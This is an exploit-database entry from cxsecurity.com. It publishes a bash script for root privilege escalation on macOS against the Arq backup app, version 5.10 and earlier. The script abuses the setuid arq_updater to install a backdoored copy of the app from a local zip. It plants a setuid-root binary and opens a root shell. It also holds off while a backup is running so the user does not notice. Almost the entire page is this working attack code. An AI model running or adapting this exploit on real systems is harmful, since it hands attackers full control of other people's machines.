Arq 5.10 Local root Privilege Escalation

2018.01.30
Credit: m4rkw
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-264

#!/bin/bash ################################################################# ###### Arq <= 5.10 local root privilege escalation exploit ###### ###### by m4rkw - https://m4.rkw.io/blog.html ###### ################################################################# app="/Applications/Arq.app" res="$app/Contents/Resources" lires="$app/Contents/Library/LoginItems/Arq Agent.app/Contents/Resources" vuln=`ls -la "$lires/arq_updater" |grep '\-rws' |grep root` if [ "$vuln" == "" ] ; then echo "Not vulnerable - auto-updates not enabled." exit 1 fi if [ "$1" != "-f" ] ; then latest_logfile="`ls -1t ~/Library/Logs/Arq\ Agent/ |head -n1`" status_line="`egrep -i 'backup session.*?(ended|started)' \ \"$HOME/Library/Logs/Arq Agent/$latest_logfile\" |tail -n1 |grep -i started`" if [ "$status_line" != "" ] ; then echo -n "WARNING: backup in progress, the user will very " echo "likely notice if we exploit now!" echo "use -f to override." exit 1 fi fi owd="`pwd`" if [ -e ~/.arq_510_privesc_exp ] ; then rm -rf ~/.arq_510_privesc_exp fi mkdir ~/.arq_510_privesc_exp cd ~/.arq_510_privesc_exp echo "copying application..." cp -R /Applications/Arq.app . echo "compiling payloads..." cat > payload.sh <<EOF #!/bin/bash rm -rf $HOME/.arq_510_privesc_exp while : do pid=\`ps auxwww |grep '$app/Contents/MacOS/Arq' |grep -v grep |xargs \ |cut -d ' ' -f2\` if [ "\$pid" != "" ] ; then kill -9 \$pid open $app/Contents/Library/LoginItems/Arq\ Agent.app exit 0 fi done EOF chmod 755 payload.sh au_relative=`echo "$lires/standardrestorer" |sed 's/^\/Applications\///'` cat > shell.c <<EOF #include <unistd.h> #include <string.h> int main(int ac, char *av[]) { if (ac > 1 && strcmp(av[1], "boom") == 0) { setuid(0); setgid(0); execl( "/bin/bash","bash","-c","mv -f $res/standardrestorer.orig $res/standardr" "estorer;chmod 4755 $res/standardrestorer;$HOME/.arq_510_privesc_exp/pay" "load.sh;/bin/bash", NULL ); } return 0; } EOF mv Arq.app/Contents/Resources/standardrestorer \ Arq.app/Contents/Resources/standardrestorer.orig gcc -o Arq.app/Contents/Resources/standardrestorer shell.c rm -f shell.c payload_size=`stat Arq.app/Contents/Resources/standardrestorer |cut -d ' ' -f8` GID=`id |sed 's/^.*gid=//' |cut -d '(' -f1` cwd=`pwd` echo "creating backdoored Arq.zip..." zip -1r Arq.zip Arq.app/ 1>/dev/null 2>/dev/null rm -rf Arq.app/ echo "executing upgrade..." "$lires/arq_updater" installupdate file://$cwd/Arq.zip $UID $GID YES \ 1>/dev/null 2>/dev/null echo "waiting..." while : do ac_size=`stat $res/standardrestorer 2>/dev/null |cut -d ' ' -f8` x=`ls -la $res/standardrestorer |grep -- '-rwsr-xr-x' |grep root` if [ "$ac_size" == "$payload_size" -a "$x" != "" ] ; then cd "$owd" $res/standardrestorer boom exit 0 fi sleep 0.2 done


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top